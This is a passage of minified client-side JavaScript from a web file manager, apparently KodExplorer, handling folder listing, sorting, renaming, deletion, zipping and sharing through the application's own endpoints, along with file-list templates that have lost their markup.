beforeListOpen)if(beforeListOpen[t]===!1)return;$(".drag-upload-box").scrollLeft(beforeScrollerLeft),ui.path.setSelectByFilename(beforeSelectFileArr),ui.fileSelect.selectSplit(beforeListSplitSelect),beforeListOpenArr={},beforeListOpen={},beforeSelectFileArr={},beforeListSplitSelect="","function"==typeof e&&e()},f5=function(e,t,a){if(void 0==e&&(e=!0),void 0==t&&(t=!1),jsonDataSortTitle(),f5Before(),beforeSelectFileArr=ui.fileLight.getAllName(),e?pathGet(G.thisPath,function(e){G.jsonData=e,mainSetData(t),pathTypeChange(G.jsonData),loadMore(),resetTotalHeight(),f5After(a),core.isApp("desktop")?checkRecycle():ui.headerAddress.addressSet()},function(){$(Config.FileBoxSelector).html("")}):(G.jsonData=jsonDataSort(G.jsonData),mainSetData(t),pathTypeChange(G.jsonData),loadMore(),resetTotalHeight(),f5After(a)),!core.isApp("desktop")){var i=G.userID||G.sid;LocalData.set("thisPath:"+i,G.thisPath)}},sortBy=function(e,t){var t="down"==t?-1:1;return function(a,i){var a=a[e],i=i[e];return pathTools.strSort(a,i)*t}},jsonDataSort=function(e){e=jsonDatafilter(e);var t=e.folderList,a=e.fileList;return t="size"==G.userConfig.listSortField||"ext"==G.userConfig.listSortField?t.sort(sortBy("name",G.userConfig.listSortOrder)):t.sort(sortBy(G.userConfig.listSortField,G.userConfig.listSortOrder)),a=a.sort(sortBy(G.userConfig.listSortField,G.userConfig.listSortOrder)),e.folderList=t,e.fileList=a,e},pathGet=function(e,t,a){var i=G.appHost+"explorer/pathList&path="+urlEncode(e);G.user&&(i=G.appHost+"share/pathList&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(e)),$.ajax({url:i,dataType:"json",beforeSend:function(){$(".tools-left .msg").stop(!0,!0).fadeIn(200)},success:function(e){if($(".tools-left .msg").fadeOut(300),!e||!e.code)return Tips.tips(e),"function"==typeof a&&a(),!1;var i=jsonDataSort(e.data);"function"==typeof t&&t(i)},error:function(e,t,i){$(".tools-left .msg").fadeOut(300),core.ajaxError(e,t,i),"function"==typeof a&&a()}})},f5Callback=function(e){f5(!0,!1,e)},jsonDatafilter=function(e){if(!e)return e;if(void 0!=e.shareList&&(selfShare=e.shareList),e.filterSuccess===!0)return e;for(var t in e)if("fileList"==t||"folderList"==t)for(var a=0;e[t].length>a;a++){var i=e[t][a];if(i.mtime&&11>=(""+i.mtime).length)if(i.atime=date(LNG.time_type,i.atime),i.ctime=date(LNG.time_type,i.ctime),e.info&&e.info.pathType==G.KOD_USER_SHARE&&-1==trim(e.thisPath,"/").indexOf("/")){var n=parseInt(i.numView);n=isNaN(n)?0:n;var o=parseInt(i.numDownload);o=isNaN(o)?0:o;var s=date("Y/m/d ",i.mtime)+" ";s+=LNG.share_view_num+n+" "+LNG.share_download_num+o,i.mtime=s}else i.mtime=date(LNG.time_type,i.mtime);i.name=htmlEncode(i.name),i.sid&&"file"==i.type&&(i.ext=htmlEncode(core.pathExt(i.path))),pathIsShare(i.path)?i.metaInfo="path-self-share":pathIsFav(i.path)&&(i.metaInfo="tree-fav"),"number"==typeof i.isReadable&&0==i.isReadable?i.mode="["+LNG.not_read+"] "+i.mode:"number"==typeof i.isWriteable&&1==i.isWriteable?i.mode="["+LNG.system_role_write+"] "+i.mode:"number"==typeof i.isReadable&&1==i.isReadable&&(i.mode="["+LNG.only_read+"] "+i.mode),e.info&&e.info.pathType==G.KOD_USER_RECYCLE&&trim(e.thisPath,"/")==G.KOD_USER_RECYCLE&&(i.menuType="menu-recycle-path")}return e.filterSuccess=!0,e},jsonDataSortTitle=function(){var up='',down='';$("#main-title .this").toggleClass("this").attr("id","").find("span").html(""),$("#main-title div[field="+G.userConfig.listSortField+"]").addClass("this").attr("id",G.userConfig.listSortOrder).find("span").html(eval(G.userConfig.listSortOrder))},pathIsShare=function(e){for(var t in G.selfShare)if(core.pathClear(G.selfShare[t].path)==core.pathClear(e))return!0;return!1},pathIsFav=function(e){var t=G.fav_list;for(var a in t)if(core.pathClear(a)==core.pathClear(e))return!0;return!1},checkRecycle=function(){$.ajax({url:G.appHost+"explorer/pathList&type=desktop&path="+G.KOD_USER_RECYCLE,dataType:"json",error:core.ajaxError,success:function(e){if(!e.code)return!1;var t=core.icon("recycle-full");0==e.data.folderList.length&&0==e.data.fileList.length&&(t=core.icon("recycle")),$(".menu-recycle-button .ico").html(t)}})},pathTypeChange=function(e){if(e.info){var t=e.info,a=t.pathType,i=e.pathReadWrite,n="menu-body-main menu-recycle-body menu-share-body",o=$(".drag-upload-box");t.canUpload=!0,(void 0!=i&&"writeable"!=i||a==G.KOD_GROUP_SHARE&&"owner"!=t.role&&1!=G.isRoot||a==G.KOD_USER_SHARE&&"owner"!=t.role&&1!=G.isRoot||a==G.KOD_GROUP_PATH&&"guest"==t.role&&1!=G.isRoot||a==G.KOD_USER_FAV||a==G.KOD_USER_RECYCLE||a==G.KOD_GROUP_ROOT_ALL||a==G.KOD_GROUP_ROOT_SELF)&&(t.canUpload=!1);var s=[G.KOD_USER_SHARE,G.KOD_USER_FAV,G.KOD_GROUP_ROOT_SELF,G.KOD_GROUP_ROOT_ALL],r=".kod-toolbar-recycle,.kod-toolbar-share";$(r).addClass("hidden"),a==G.KOD_USER_RECYCLE?(o.removeClass(n).addClass("menu-recycle-body"),$(".tools-left .kod-toolbar").addClass("hidden"),$(".kod-toolbar-recycle").removeClass("hidden")):-1!==s.indexOf(a)?-1===core.pathClear(rtrim(G.thisPath,"/")).indexOf("/")?(o.removeClass(n).addClass("menu-share-body"),$(".tools-left .kod-toolbar").addClass("hidden"),$(".kod-toolbar-share").removeClass("hidden"),t.id==G.userID?($(".menu-share-path-menu").find(".open-the-path,.share-edit,.remove").removeClass("hidden"),$(".menu-share-path-more").find(".remove").removeClass("hidden")):($(".menu-share-path-menu").find(".open-the-path,.share-edit,.remove").addClass("hidden"),$(".menu-share-path-more").find(".remove").addClass("hidden"))):(o.removeClass(n).addClass("menu-body-main"),$(".tools-left .kod-toolbar").addClass("hidden"),$(".kod-toolbar-path").removeClass("hidden")):(o.removeClass(n).addClass("menu-body-main"),$(".tools-lef .kod-toolbar").addClass("hidden"),$(".kod-toolbar-path").removeClass("hidden")),currentPathMenu(e)}},currentPathMenu=function(e){var t=e.info,a=e.pathReadWrite,i=t.pathType,n=".create-link,.create-project,.cute,.remove,.rname,.zip,.unzip-this,.unzip-folder,.newfile,.newfolder,.new-file-other,.app-create,.app-install,.past,.upload,.clone",o="disable",s=$(".kod-toolbar-path .btn").not(".toolbar-path-more"),r=$("ul.menu-folder,ul.menu-more,ul.menu-file,ul.file-continerMenu");t.canUpload?(r.find(n).removeClass(o),$(".path-tips").hide(),s.removeClass("disabled")):(s.addClass("disabled"),r.find(n).addClass(o),$(".path-tips span").html(LNG.only_read),i==G.KOD_USER_RECYCLE||i==G.KOD_USER_SHARE?($(".path-tips").hide(),s.removeClass("disabled"),i==G.KOD_USER_SHARE&&G.userID!=t.id&&s.addClass("disabled")):$(".path-tips").show());var l=$(".group-space-use");if((i==G.KOD_GROUP_PATH||i==G.KOD_GROUP_SHARE)&&G.isRoot||i==G.KOD_GROUP_PATH&&"owner"==t.role){var c=e.groupSpaceUse;if(c){var d=core.userSpaceHtml(c.sizeUse+"/"+c.sizeMax);l.removeClass("hidden").html(d)}else l.addClass("hidden")}else l.addClass("hidden");if(e.userSpace){var c=e.userSpace,d=core.userSpaceHtml(c.sizeUse+"/"+c.sizeMax);$(".user-space-info").html(d)}if("notExists"==a&&($(".path-tips span").html(LNG.not_exists),$(".path-tips").show()),$(".role-label-box").html(""),i==G.KOD_GROUP_SHARE){var p=""+LNG.group_guest+"";$(".role-label-box").html(p),G.isRoot&&$(".role-label-box").html("")}else if(i==G.KOD_GROUP_PATH&&t.groupRole){var p=""+t.groupRole.name+"";$(".role-label-box").html(p)}(i==G.KOD_GROUP_ROOT_ALL||i==G.KOD_GROUP_ROOT_SELF||i==G.KOD_USER_FAV||i==G.KOD_GROUP_SHARE)&&$(".path-tips").hide(),1==G.isRoot&&t.adminRealPath?$(".admin-real-path").removeClass("hidden"):$(".admin-real-path").addClass("hidden")};return{f5:f5,f5Callback:f5Callback,pathTypeChange:pathTypeChange,pathChildrenTree:pathChildrenTree,pathChildrenSplit:pathChildrenSplit,init:function(){$(window).bind("resize",function(){resetTotalHeight(),core.isApp("desktop")?ui.resetDesktopIcon():ui.headerAddress.resetWidth()}),bindScrollLoadMore()}}}),define("app/path/tpl/file/list.html",[],"\n{{if type=='icon-folder'}}\n
    \n {{if !list.menuType}}
    {{/if}}\n
    \n
    \n {{fileIconMake('folder','icon',list)}}\n
    \n {{if list.metaInfo}}\n
    {{list.metaInfo |kod.core.icon}}
    \n {{/if}}\n
    \n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{list.name}}\n {{/if}}\n \n
    \n
    \n\n\n{{else if type=='list-folder'}}\n
    \n {{if !list.menuType}}
    {{/if}}\n
    \n
    \n {{if list.metaInfo}}\n
    {{list.metaInfo |kod.core.icon}}
    \n {{/if}}\n \n {{if list.isParent&&list.isReadable}}{{/if}}\n \n
    \n {{fileIconMake('folder','list',list)}}\n
    \n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{list.name}}\n {{/if}}\n \n
    \n
    {{LNG.folder}}
    \n
    \n
    {{list.mtime || \"\"}}
    \n
    \n
    \n{{if list.isParent&&list.isReadable}}\n
    \n{{/if}}\n\n\n{{else if type=='split-folder'}}\n
    \n {{if !list.menuType}}
    {{/if}}\n
    \n
    \n {{if list.metaInfo}}\n
    {{list.metaInfo |kod.core.icon}}
    \n {{/if}}\n
    \n {{fileIconMake('folder','split',list)}}\n
    \n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{list.name}}\n {{/if}}\n \n \n {{if list.isReadable && typeof(list.menuType)==\"undefined\"}}\n \n {{/if}}\n \n
    \n
    \n\n\n{{else if type=='icon-file'}}\n
    \n {{if !list.menuType}}
    {{/if}}\n
    \n {{fileIconMake('file','icon',list)}}\n {{if list.metaInfo}}\n
    {{list.metaInfo |kod.core.icon}}
    \n {{/if}}\n
    \n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{if list.ext=='oexe'}}{{list.name.replace('.oexe','')}}{{else}}{{list.name}}{{/if}}\n {{/if}}\n \n
    \n
    \n\n\n{{else if type=='list-file'}}\n
    \n {{if !list.menuType}}
    {{/if}}\n
    \n
    \n \n {{fileIconMake('file','list',list)}}\n {{if list.metaInfo}}\n
    {{list.metaInfo |kod.core.icon}}
    \n {{/if}}\n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{if list.ext=='oexe'}}{{list.name.replace('.oexe','')}}{{else}}{{list.name}}{{/if}}\n {{/if}}\n \n
    \n
    {{list.ext |kod.window.htmlEncode}} {{LNG.file}}
    \n
    {{list.size |pathTools.fileSize}}
    \n
    {{list.mtime || \"\"}}
    \n
    \n
    \n\n\n{{else if type=='split-file'}}\n
    \n {{if !list.menuType}}
    {{/if}}\n
    \n
    \n {{fileIconMake('file','split',list)}}\n {{if list.metaInfo}}\n
    {{list.metaInfo |kod.core.icon}}
    \n {{/if}}\n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{if list.ext=='oexe'}}{{list.name.replace('.oexe','')}}{{else}}{{list.name}}{{/if}}\n {{/if}}\n \n
    \n
    \n{{/if}}\n\n"),define("app/path/path",["./pathOperate","./clipboard","./search"],function(e){var t=e("./pathOperate"),a=e("./clipboard"),i=e("./search"),n=void 0,o=function(){if(G.jsonData.info.pathType==G.KOD_USER_RECYCLE||G.jsonData.info.pathType==G.KOD_USER_SHARE)return!0;if(ui.fileLight){var e=ui.fileLight.fileListSelect();if(e.hasClass("systemBox"))return Tips.tips(LNG.path_can_not_action,"warning"),!1}return!0},s=function(e,t,a,i){if(e){if(!core.isApp("explorer"))return core.explorer(e),void 0;if(e==G.thisPath)return void 0!=t&&""!=t&&Tips.tips(LNG.path_is_current,"info"),void 0;G.thisPath=e.replace(/\\/g,"/"),G.thisPath=e.replace(/\/+/g,"/"),"/"!=G.thisPath.substr(G.thisPath.length-1)&&(G.thisPath+="/");var n=$(".dialog-file-upload");if(n.length>0){var o="none"==n.css("display")||"hidden"==n.css("visibility");o||core.upload()}if(G.sid!==void 0&&(window.location.href="#"+urlEncode(G.thisPath)),core.playSound("folder_open"),i||ui.path.history.add(G.thisPath),"split"==G.userConfig.listType){var s=$(".split-box .file[data-path="+pathHashEncode(G.thisPath)+"]");if(0!=s.length&&0!=s.find(".children-more-cert").length)return s.click(),void 0;$(".file-list-split .split-box").remove()}ui.f5Callback(function(){"function"==typeof a&&a()})}},r=function(){var e=[],t=60,a=0,i=function(i){var n=e.length-1;return n==a&&e[n]==i?r():(a!=n&&(e=e.slice(0,a+1)),e[e.length-1]!=i&&e.push(i),e.length>=t&&(e=e.slice(1)),a=e.length-1,r(),void 0)},n=function(){e.length-1>=a+1&&(s(e[++a],"","",!0),r())},o=function(){a-1>=0&&(s(e[--a],"","",!0),r())},r=function(){var t="disable",i=e.length-1;$("#btn-history-next").addClass(t),$("#btn-history-back").addClass(t),(0!=a||0!=i)&&(a>0&&i>=a&&$("#btn-history-back").removeClass(t),a>=0&&a!=i&&$("#btn-history-next").removeClass(t))};return{add:i,back:o,next:n,list:function(){return e}}}(),l=function(e){if(void 0!=e){"string"==typeof e&&(e=[e]);for(var t=0;e.length>t;t++)e[t]=trim(e[t],"/");ui.fileLight.clear(),ui.fileLight.fileListAll().each(function(){var t=trim(ui.fileLight.path($(this)),"/");t&&-1!=$.inArray(t,e)&&$(this).addClass(Config.SelectClassName)}),ui.fileLight.select(),ui.fileLight.setInView()}},c=function(e){if(""!=e){if(e=e.toLowerCase(),void 0==n||G.thisPath!=n.path||e!=n.key){var t=[];ui.fileLight.fileListAll().each(function(){var a=ui.fileLight.name($(this)),i=ui.fileLight.path($(this));a&&e==a.substring(0,e.length).toLowerCase()&&t.push(i)}),n={key:e,path:G.thisPath,index:0,list:t}}0!=n.list.length&&(Tips.pop(n.key),l(n.list[n.index++]),n.index==n.list.length&&(n.index=0))}},d=function(e){return""==e?(ui.fileLight.clear(),void 0):(ui.fileLight.clear(),ui.fileLight.fileListAll().each(function(t){var a=ui.fileLight.name($(this));-1!=a.toLowerCase().indexOf(e)&&$(ui.fileLight.fileListAll()).eq(t).addClass(Config.SelectClassName)}),ui.fileLight.select(),ui.fileLight.setInView(),void 0)},p=function(e,t){var a=G.thisPath+e;return void 0==t&&(a+="/"),0!=$('.bodymain .file[data-path="'+pathHashEncode(a)+'"]').length?!0:!1},u=function(e,t){var a,i=0,n="."+t;if((void 0==t||""==t)&&(n=""),!p(e+n,t))return e+n;for(a=e+"(0)"+n;p(a,t);)i++,a=e+"("+i+")"+n;return a},f=function(e,t){var a,i=0,n=G.jsonData.folderList,o=G.jsonData.fileList,s=n,r=G.userConfig.listSortField,l=G.userConfig.listSortOrder,c={name:e,size:0,ext:t,mtime:date("Y/m/d H:i:s",time())};for(core.isApp("desktop")&&(i+=$(".menu-default").length+1),"file"==t?(c.ext=core.pathExt(e),s=o,"up"==l&&(i+=n.length)):"down"==l&&(i+=o.length),a=0;s.length>a;a++)if("down"==l){if(-1==pathTools.strSort(s[a][r],c[r]))break}else if(-1!=pathTools.strSort(s[a][r],c[r]))break;return a+i-1},h=function(a,i,n){ui.fileLight.clear();var o=f(i,a),s=$(Config.FileBoxSelector);"split"==G.userConfig.listType&&(s=$(".split-box.split-select").find(".content"));var r=e("./tpl/file/create.html"),l=template.compile(r),c=l({type:a,newname:i,ext:n,listType:G.userConfig.listType});if(-1==o||0==s.find(".file").length)s.html(c+s.html());else{var d=s.find(".file:eq("+o+")");0==d.length&&(d=s.find(".file").last()),"split"==G.userConfig.listType&&(d=$(".split-box.split-select .file").last()),$(c).insertAfter(d)}var u=$(".textarea .newfile"),h=i.length;"folder"!=a&&-1!=i.indexOf(".")&&(h=i.length-n.length-1),u.textSelect(0,h),"split"==G.userConfig.listType&&u.css("width",u.parents(".filename").width()-40),"icon"==G.userConfig.listType?($("#makefile").css({height:$("#makefile").width()+15,transition:"none"}),$("#makefile .textarea").css("margin-top","-13px")):$("#makefile .x-item-file").addClass("small"),core.isApp("desktop")&&ui.resetDesktopIcon();var m=function(e){e===!1?$("#makefile").remove():v(e)},g=function(e){if(""==trim(e))return $("#makefile").remove(),Tips.tips(LNG.error,"warning"),void 0;if(p(e,n))$("#makefile").remove(),Tips.tips(LNG.path_exists,"warning");else{var i=G.thisPath;"split"==G.userConfig.listType&&(i=ui.fileLight.path($(".file-icon-edit").parents(".split-box"))),"folder"==a?t.newFolder(i+e,m):t.newFile(i+e,m)}};ui.fileLight.setInView($(".file-continer .file-icon-edit")),u.focus().autoTextarea(),u.unbind("keydown").keydown(function(e){13==e.keyCode&&(stopPP(e),e.preventDefault(),g(u.attr("value"))),27==e.keyCode&&$("#makefile").remove()}).unbind("blur").blur(function(){g(u.attr("value"))})},m=function(){var e="",a=ui.fileLight.fileListSelect(),i=ui.fileLight.name(a),n=core.pathFather(ui.fileLight.path(a)),s=ui.fileLight.type(a);if(1==a.length&&o()){if(a.hasClass("menuSharePath"))return ui.path.shareEdit(),void 0;var r=htmlEncode(rtrim(i,".oexe")),l="";"icon"==G.userConfig.listType&&(l="",a.css({height:a.height()})),$(a).addClass("file-icon-edit").find(".title").html("
    "+l+"
    ");var c=$("#pathRenameTextarea");"split"==G.userConfig.listType&&c.css({width:c.parents(".filename").width()-32,height:c.parents(".filename").height()+1});var d=i.length;"folder"!=s&&-1!=i.indexOf(".")&&(d=i.length-s.length-1),s||0!=i.indexOf(".")?c.textSelect(0,d):c.textSelect(0,i.length);var p=function(o){if("oexe"==s&&(o+=".oexe"),o!=i)e=n+i,o=n+o,t.rname(e,o,function(e){e===!1?$(a).removeClass("file-icon-edit").find(".title").html(htmlEncode(i)):v(e)});else{var r=i;".oexe"==r.substr(-5)&&(r=r.substr(0,r.length-5)),$(a).removeClass("file-icon-edit").find(".title").html(htmlEncode(r))}};c.focus().autoTextarea(),c.keydown(function(e){13==e.keyCode&&(e.preventDefault(),stopPP(e),p(c.attr("value"))),27==e.keyCode&&("oexe"==s&&(i=i.replace(".oexe","")),$(a).removeClass("file-icon-edit").find(".title").html(i))}).unbind("blur").blur(function(){p(c.val())})}},v=function(e){ui.fileLight.clear(),ui.f5Callback(function(){l(e),core.isApp("explorer")&&ui.tree.checkIfChange(G.thisPath)})},g=function(e){var t={},a=[];e.sort(function(e,t){return e.path==t.path?0:e.path>t.path?1:-1});for(var i=function(e){for(var a=e;""!=e;){if(t[e]!==void 0)return 1==t[e]?!0:a==e?(t[e]=1,!1):!0;e=core.pathFather(e)}return!1},n=0;e.length>n;n++)if("folder"==e[n].type){var o=rtrim(e[n].path,"/")+"/";t[o]||i(o)||(t[o]=0)}for(var n=0;e.length>n;n++){var o=e[n].path;"folder"==e[n].type&&(o=rtrim(o,"/")+"/"),i(o)||a.push(e[n])}return a},b=function(e,t,a){var i=ui.fileLight.fileListSelect();if(e){var n=[];return 0==i.length?n:(i.each(function(){var e=ui.fileLight.path($(this)),t="folder"==ui.fileLight.type($(this))?"folder":"file";n.push({path:e,type:t})}),g(n))}if(1!=i.length)return{path:"",type:""};var t=ui.fileLight.path(i),a=ui.fileLight.type(i);return{path:t,type:a}},y=function(e,t){for(var a in G.jsonData)if("fileList"==a||"folderList"==a)for(var i=0;G.jsonData[a].length>i;i++)if(G.jsonData[a][i][e]==t)return G.jsonData[a][i]};return{search:i,makeParam:b,refreshCallback:v,history:r,getJsondataCell:y,checkSystemPath:o,pathOperate:t,appList:function(){t.appList(b().path)},appInstall:function(){t.appInstall(b().path)},openWindow:function(){var e=b();return"folder"==e.type&&-1!=core.path2url(e.path).search("explorer/fileProxy")?(Tips.tips(LNG.path_can_not_action,!1),void 0):(kodApp.openWindow(e.path),void 0)},open:function(e){var t=ui.fileLight.fileListSelect();if(void 0!=e||core.isApp("editor"))return kodApp.setLastOpenTarget($(".curSelectedNode").parent()),kodApp.open(e),void 0;if(0!=t.length){var a=b();if(0!=$(t).find(".file-not-exists").length)return Tips.tips(LNG.share_error_path,!1),void 0;if("split"!=G.userConfig.listType||"folder"!=a.type){if("oexe"==a.type){var i=t.attr("data-app");if(i){var n=jsonDecode(base64Decode(i));return core.openApp(n),void 0}}kodApp.setLastOpenTarget(t),kodApp.open(a.path,a.type)}}},share:function(){t.share(b())},setBackground:function(){var e=core.path2url(b().path);ShareData.frameTop("",function(t){t.ui.setWall(e) -}),ui.setWall(e),t.setBackground(e)},createLink:function(e){var a=b(),i=ui.fileLight.fileListSelect().last();a.name=trim(i.find(".filename").text()),t.createLink(a.path,a.name,a.type,e,v)},createProject:function(){t.createProject(b().path,v)},download:function(){var e=b(!0),a=!1;$.each(e,function(){"folder"==this.type&&(a=!0)}),a||$.isIE()?t.zipDownload(e):$.each(e,function(){kodApp.download(this.path)})},shareEdit:function(){var e=y("path",b().path);try{var a=G.jsonData.shareList[e.sid];t.shareBox(a)}catch(i){}},shareOpenWindow:function(){var e=y("path",b().path),t="file";"folder"==e.type&&(t=1==e.codeRead?"codeRead":"folder");var a=G.appHost+"share/"+t+"&user="+G.jsonData.info.id+"&sid="+e.sid;window.open(a)},shareOpenPath:function(){var e=b(),t=y("path",e.path);if(!t||!G.jsonData.shareList)return kodApp.open(e.path,e.type),void 0;var a=G.jsonData.shareList[t.sid],i=core.pathFather(a.path),n=core.pathThis(a.path);"folder"==a.type?ui.path.list(a.path,""):ui.path.list(i,"",function(){l(n)})},explorer:function(){core.explorer(b().path)},explorerNew:function(){window.open(G.appHost+"explorer&path="+b().path)},openProject:function(){core.explorerCode(b().path)},search:function(){i("",b().path)},fav:function(){var e=b(),a=ui.fileLight.fileListSelect().last();e.name=trim(a.find(".filename").text()),t.fav(e)},recycleClear:function(){t.remove([{type:"recycle-clear",path:""}],function(){ui.f5()})},remove:function(e,a,i){if(G.jsonData.info&&o()){var n=b(!0);G.jsonData.info&&G.jsonData.info.pathType==G.KOD_USER_SHARE&&G.jsonData.info.id==G.userID&&-1==trim(G.thisPath,"/").indexOf("/")&&$.each(n,function(e){var t=y("path",n[e].path);void 0!=t&&(n[e].type="share",n[e].path=t.sid)}),i?t.remove(n,i,e,a):t.remove(n,v,e,a)}},favRemove:function(){var e=$(".file.select .filename");e.each(function(a){var i=trim($(this).text());a!=e.length-1?t.favRemove(i,"",!0):t.favRemove(i,function(e){Tips.tips(e),ui.tree.refreshFav()},!0)})},clipboard:function(){a.clipboard()},copy:function(){o()&&a.copy(b(!0))},cute:function(){o()&&a.cute(b(!0),ui.f5)},cuteDrag:function(e){a.cuteDrag(b(!0),e,v)},copyDrag:function(e,t){a.copyDrag(b(!0),e,v,t)},copyTo:function(){core.api.pathSelect({type:"folder",title:LNG.copy_to},function(e){a.copyDrag(b(!0),e,v,!1)})},cuteTo:function(){core.api.pathSelect({type:"folder",title:LNG.cute_to},function(e){a.cuteDrag(b(!0),e,v)})},past:function(){var e=G.thisPath;"split"==G.userConfig.listType&&($containBox=$(".split-box.split-select"),1==$containBox.length&&(e=ui.fileLight.path($containBox))),a.past(e,v)},info:function(){t.info(b(!0))},newFile:function(e){void 0==e&&(e="txt"),h("file",u("newfile",e),e)},newFolder:function(){h("folder",u(LNG.newfolder),"")},shareFile:function(){var e=G.appHost+"share/file&sid="+G.sid+"&user="+G.user+"&path="+urlEncode(b().path);window.open(e)},rname:m,list:s,setSearchByStr:d,setSelectByChar:c,setSelectByFilename:l}}),define("app/path/pathOperate",[],function(e){tplFileInfo=e("./tpl/fileinfo/fileInfo.html"),tplPathInfo=e("./tpl/fileinfo/pathInfo.html");var t=["/","\\",":","*","?",'"',"<",">","|"],a=["/","\\"],i=function(e){var i=function(e,t){for(var a=t.length,i=0;a>i;i++)if(e.indexOf(t[i])>0)return!0;return!1},n=a;return G.systemOS&&"windows"==G.systemOS&&(n=t),i(e,n)?(Tips.tips(LNG.path_not_allow+": "+n.join(", "),!1),!1):!0},n=function(e){for(var t=[],a=function(e){return e?e.replace(/"/g,'\\\\"'):e},i=0;e.length>i;i++)t.push({type:a(e[i].type),path:urlEncode(a(e[i].path))});return"dataArr="+jsonEncode(t)},o=function(e,t){if(e){var a=core.pathThis(e);return i(a)?($.ajax({dataType:"json",url:G.appHost+"explorer/mkfile&path="+urlEncode(e),beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(e){Tips.close(e),"function"==typeof t&&(e&&e.info?t(e.info):t(!1))}}),void 0):("function"==typeof t&&t(),void 0)}},s=function(e,t){if(e){var a=core.pathThis(e);return i(a)?($.ajax({dataType:"json",url:G.appHost+"explorer/mkdir&path="+urlEncode(e),beforeSend:function(){"function"==typeof t&&Tips.loading()},error:core.ajaxError,success:function(e){Tips.close(e),"function"==typeof t&&(e&&e.info?t(e.info):t(!1))}}),void 0):("function"==typeof t&&t(),void 0)}},r=function(e,t,a){return e&&t&&e!=t?i(core.pathThis(t))?($.ajax({type:"POST",dataType:"json",url:G.appHost+"explorer/pathRname",data:"path="+urlEncode(e)+"&rnameTo="+urlEncode(t),beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(e){Tips.close(e),"function"==typeof a&&(e&&e.info?a(e.info):a(!1))}}),void 0):("function"==typeof a&&a(),void 0):void 0},l=function(e,t,a,i){if(a=void 0==a?!1:a,i=void 0==i?!1:i,window.event&&window.event.shiftKey&&(i=!0),!(1>e.length)){var o=LNG.remove_title,s=LNG.remove_info,r=G.appHost+"explorer/pathDelete",l=n(e);if("share"==e[0].type&&(o=LNG.share_remove,s=LNG.share_remove_tips,r=G.appHost+"userShare/del"),i&&(s=LNG.remove_info_force,o=LNG.remove_title_force,r+="&shiftDelete=1"),("recycle-clear"==e[0].type||G.USER_RECYCLE&&G.thisPath==G.USER_RECYCLE||G.thisPath==core.pathFather(G.myhome)+"recycle_kod/")&&(s=LNG.recycle_clear_info,r=G.appHost+"explorer/pathDeleteRecycle",o=LNG.recycle_clear,"recycle-clear"==e[0].type&&(l="postEmpty=1")),e[0]&&e[0].path){var c=""+htmlEncode(core.pathThis(e[0].path))+"";s=e.length>1?c+' ... '+e.length+LNG.remove_item+"
    "+s:c+"
    "+s}var d=function(){$.ajax({url:r,type:"POST",dataType:"json",data:l,beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(a){if(Tips.close(a),ShareData.frameTop("",function(e){e.ui.f5()}),"share"==e[0].type){G.selfShare=a.info;var i=$.dialog.list["share-dialog"];void 0!=i&&i.close()}o==LNG.recycle_clear?core.playSound("recycle_clear"):core.playSound("file_remove"),"function"==typeof t&&t(a)}})};a?d():$.dialog({id:"dialog-path-remove",fixed:!0,icon:"question",title:o,padding:"40px 40px",lock:!0,background:"#000",opacity:.1,content:"
    "+s+"
    ",ok:d,cancel:!0})}},c=function(e){if(core.authCheck("explorer.fileDownload",!0)&&!(1>e.length)){var t=G.appHost+"explorer/zipDownload";G.sharePage!==void 0&&(t=G.appHost+"share/zipDownload&user="+G.user+"&sid="+G.sid),$.ajax({url:t,type:"POST",dataType:"json",data:n(e),beforeSend:function(){Tips.loading(LNG.zip_download_ready)},error:core.ajaxError,success:function(e){Tips.close(e),Tips.tips(e);var t=G.appHost+"explorer/fileDownloadRemove&path="+urlEncode(e.info);t+="&accessToken="+G.accessToken,G.sharePage!==void 0&&(t=G.appHost+"share/fileDownloadRemove&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(e.info)),$.dialog({icon:"succeed",title:!1,time:2,content:LNG.download_ready+"..."}),$('').appendTo("body")}})}},d=function(e,t,a){1>e.length||(a||(a="zip"),$.ajax({url:G.appHost+"explorer/zip&fileType="+a,type:"POST",dataType:"json",data:n(e),beforeSend:function(){Tips.loading(LNG.ziping)},error:core.ajaxError,success:function(e){Tips.close(e),e.code&&core.playSound("drag_drop"),"function"==typeof t&&t(e.info)}}))},p=function(e,t,a){if(e){var i=function(e){$.ajax({url:e,beforeSend:function(){Tips.loading(LNG.unziping)},error:core.ajaxError,success:function(e){Tips.close(e),"function"==typeof t&&t(e)}})},n=G.appHost+"explorer/unzip&path="+urlEncode(e);"toThis"==a&&(n+="&toThis=1"),"toFolder"==a?core.api.pathSelect({type:"folder",title:LNG.unzip_to},function(e){n+="&pathTo="+e,i(n)}):i(n)}},u=function(e){var t=e.path,a=core.pathPre(t);if(a==G.KOD_GROUP_PATH||a==G.KOD_GROUP_SHARE||a==G.KOD_USER_SHARE)return Tips.tips(LNG.path_can_not_share,"warning"),void 0;var i="folder"==e.type?"folder":"file";1>t.length||core.authCheck("userShare.set",!0)&&$.ajax({url:G.appHost+"userShare/checkByPath&path="+urlEncode(t),dataType:"json",error:core.ajaxError,success:function(e){if(e.code)f(e.data);else{G.selfShare=e.info;var a={path:t,type:i,name:core.pathThis(t)};h(a,function(e){e.code?(G.selfShare=e.info,ui.f5(),f(e.data)):(Tips.tips(e),f(void 0,function(){$(".content-info input[name=type]").val(i),$(".content-info input[name=path]").val(t),$(".content-info input[name=name]").val(core.pathThis(t)+"(1)"),"file"==i&&($(".label-code-read").addClass("hidden"),$(".label-can-upload").addClass("hidden"))}))})}}})},f=function(t,a){0!=$(".share-dialog").length&&$(".share-dialog").shake(3,30,100),e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){m(t),void 